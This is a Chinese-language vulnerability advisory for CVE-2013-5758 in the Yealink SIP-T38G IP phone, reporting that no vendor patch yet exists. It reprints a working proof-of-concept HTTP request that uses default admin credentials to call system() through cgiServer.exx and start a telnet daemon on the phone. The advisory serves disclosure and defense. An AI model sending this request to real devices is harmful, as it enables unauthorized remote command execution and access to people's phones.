发布日期:2014-08-03
更新日期:2014-08-11
受影响系统:
yealink SIP-T38G
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2013-5758
SIP-T38G是亿联千兆彩屏网络电话。
Yealink VoIP Phone SIP-T38G处理系统调用时会触发cgi-bin/cgiServer.exx内的安全漏洞,经过身份验证的远程攻击者通过调用请求主题内的系统方法,利用此漏洞可执行任意命令。
<*来源:Mr.Un1k0d3r
链接:Yealink IP Phone SIP-T38G /cgi-bin/cgiServer.exx system Call Remote Command Execution
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Title: Yealink VoIP Phone SIP-T38G Remote Command Execution
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage:
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5758
Description:
Using cgiServer.exx we are able to send OS command using the system
function.
POC:
POST /cgi-bin/cgiServer.exx HTTP/1.1
Host: 10.0.75.122
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4= (Default Creds CVE-2013-5755)
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
system("/bin/busybox%20telnetd%20start")
--
*Mr.Un1k0d3r** or 1 #*
建议:
--------------------------------------------------------------------------------
厂商补丁:
yealink
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: